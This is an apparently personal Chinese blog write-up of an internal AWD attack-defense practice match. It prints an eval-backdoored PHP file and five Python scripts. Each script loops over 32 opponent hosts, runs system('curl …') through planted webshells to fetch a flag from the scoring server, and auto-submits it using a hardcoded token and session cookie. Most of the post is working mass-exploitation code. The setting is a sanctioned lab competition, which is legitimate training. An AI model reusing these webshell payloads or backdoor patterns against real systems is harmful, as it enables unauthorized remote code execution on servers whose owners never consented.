记一次简单的内部AWD

background

没啥含金量，一次内部的练习赛，是个人赛，记录下来是觉得这个平台很有意思。2个半小时，一人运维6台机器，都是web机器，tql
上来就直接打，压根没有fix阶段，我全程都在写attack脚本，所以压根没管fix，感觉师傅们都有点摆烂，所以还是我侥幸拿了第一

详情

6台机器，有一台ssh上不去，应该是平台的问题。4台机子都是直接内置eval后门，d盾扫一下就出来了，还有一台也是内置后门，只不过做了点手段

//action.php
<?php
require_once("library/common.php");
require_once("library/view.php");
$page = filter($_POST['page']).'.php';
$post_data = array();
foreach ($_POST as $key => $value) {
    $post_data[$key] = $value;
}

if (file_exists($page))
{
    @eval($_POST['pages']);
    @require_once($page);
}
?>

用法也简单

action.php?page=action&pages=phpinfo();

只不过这个平台好有意思，需要使用gamebox去curl请求平台，然后平台返回一个flag，将这个flag提交即可得分
也就是说flag压根不在gamebox上，想要拿到flag简单的路径穿越这个压根不行，必须要rce获取到gamebox权限才能拿到flag
于是乎搓脚本就完事了

web1

import requests
import re
import time

while True:
    for i in range(1,33):
        url="http://4.2.{}.1/application/admin/template/webshell.php".format(i)
        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1"
        }
        data="key=system('curl -k https://192.18.1.253/Getkey/index/index');"
        try:
            resp=requests.post(url=url,data=data,headers=headers,timeout=1)
            flag=resp.text
            pattern = r'flag\{(.+?)\}'
            match_obj = re.search(pattern, flag)
            if match_obj:
                flag_content = match_obj.group(1)
                flag='flag{'+flag_content+'}'
                print(flag)
            else:
                print('未找到 flag{} 标记')

            url="https://192.18.1.253/api/comp/question/saveAttack"
            headers={
                "Host": "192.18.1.253",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "application/json, text/plain, */*",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
            "Origin": "https://192.18.1.253",
            "Connection": "close",
            "Referer": "https://192.18.1.253/",
                "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
                "Sec-Fetch-Dest": "empty",
                "Sec-Fetch-Mode": "cors",
                "Sec-Fetch-Site": "same-origin"
            }
            data="comp_id=5&uanswer={}&id=29&question_id=10364".format(flag)

            resp=requests.post(url,headers=headers,data=data,verify=False)
            print(resp.content.decode('unicode_escape'))
        except requests.exceptions.Timeout:
            print("超时")
    time.sleep(60)

web2

import requests
import re
import time

while True:
    for i in range(1,33):
        url="http://4.2.{}.2/action.php".format(i)
        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1"
        }
        data="page=action&pages=system('curl -k https://192.18.1.253/Getkey/index/index');"
        try:
            resp=requests.post(url=url,data=data,headers=headers,timeout=1)
            flag=resp.text
            pattern = r'flag\{(.+?)\}'
            match_obj = re.search(pattern, flag)
            if match_obj:
                flag_content = match_obj.group(1)
                flag='flag{'+flag_content+'}'
                print(flag)
            else:
                print('未找到 flag{} 标记')

            url="https://192.18.1.253/api/comp/question/saveAttack"
            headers={
                "Host": "192.18.1.253",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "application/json, text/plain, */*",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
            "Origin": "https://192.18.1.253",
            "Connection": "close",
            "Referer": "https://192.18.1.253/",
                "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
                "Sec-Fetch-Dest": "empty",
                "Sec-Fetch-Mode": "cors",
                "Sec-Fetch-Site": "same-origin"
            }
            data="comp_id=5&uanswer={}&id=30&question_id=10361".format(flag)

            resp=requests.post(url,headers=headers,data=data,verify=False)
            print(resp.content.decode('unicode_escape'))
        except requests.exceptions.Timeout:
            print("超时")
    time.sleep(60)

web4

import requests
import time
while True:
    for i in range(1,33):
        url="http://4.2.{}.4/templates/system/index.php?b=curl -k https://192.18.1.253/Getkey/index/index".format(i)
        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1"
        }
        try:
            resp=requests.get(url=url,headers=headers,timeout=1)
            flag=resp.text
            print(flag)
            url="https://192.18.1.253/api/comp/question/saveAttack"
            headers={
                "Host": "192.18.1.253",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "application/json, text/plain, */*",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
            "Origin": "https://192.18.1.253",
            "Connection": "close",
            "Referer": "https://192.18.1.253/",
                "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
                "Sec-Fetch-Dest": "empty",
                "Sec-Fetch-Mode": "cors",
                "Sec-Fetch-Site": "same-origin"
            }
            data="comp_id=5&uanswer={}&id=33&question_id=10358".format(flag)

            resp=requests.post(url,headers=headers,data=data,verify=False)
            print(resp.content.decode('unicode_escape'))
        except requests.exceptions.Timeout:
            print("超时")
    time.sleep(60)

web5

import requests
import re
import time

while True:
    for i in range(1,33):
        url="http://4.2.{}.5/images/93277ac25e12820af94c499ba23e769f.phtml?http:%2f%2f4.2.7.5%2fimages%2f93277ac25e12820af94c499ba23e769f.phtml".format(i)
        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1"
        }
        data="c=system('curl -k https://192.18.1.253/Getkey/index/index');"
        try:
            resp=requests.post(url=url,data=data,headers=headers,timeout=1)
            flag=resp.text  
            pattern = r'flag\{(.+?)\}'
            match_obj = re.search(pattern, flag)
            if match_obj:
                flag_content = match_obj.group(1)
                flag='flag{'+flag_content+'}'
                print(flag)
            else:
                print('未找到 flag{} 标记')

            url="https://192.18.1.253/api/comp/question/saveAttack"
            headers={
                "Host": "192.18.1.253",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "application/json, text/plain, */*",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
            "Origin": "https://192.18.1.253",
            "Connection": "close",
            "Referer": "https://192.18.1.253/",
                "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
                "Sec-Fetch-Dest": "empty",
                "Sec-Fetch-Mode": "cors",
                "Sec-Fetch-Site": "same-origin"
            }
            data="comp_id=5&uanswer={}&id=32&question_id=10366".format(flag)

            resp=requests.post(url,headers=headers,data=data,verify=False)
            print(resp.content.decode('unicode_escape'))
        except requests.exceptions.Timeout:
            print("超时")
    time.sleep(60)

web6

import requests
import time

while True:
    for i in range(1,33):
        url="http://4.2.{}.6/app/webroot/config.php".format(i)
        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1"
        }
        data="shell=system('curl -k https://192.18.1.253/Getkey/index/index');"
        try:
            resp=requests.post(url=url,data=data,headers=headers,timeout=1)
            flag=resp.text
            url="https://192.18.1.253/api/comp/question/saveAttack"
            headers={
                "Host": "192.18.1.253",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "application/json, text/plain, */*",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
            "Origin": "https://192.18.1.253",
            "Connection": "close",
            "Referer": "https://192.18.1.253/",
                "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
                "Sec-Fetch-Dest": "empty",
                "Sec-Fetch-Mode": "cors",
                "Sec-Fetch-Site": "same-origin"
            }
            data="comp_id=5&uanswer={}&id=34&question_id=10363".format(flag)

            resp=requests.post(url,headers=headers,data=data,verify=False)
            print(resp.content.decode('unicode_escape'))
        except requests.exceptions.Timeout:
            print("超时")
    time.sleep(60)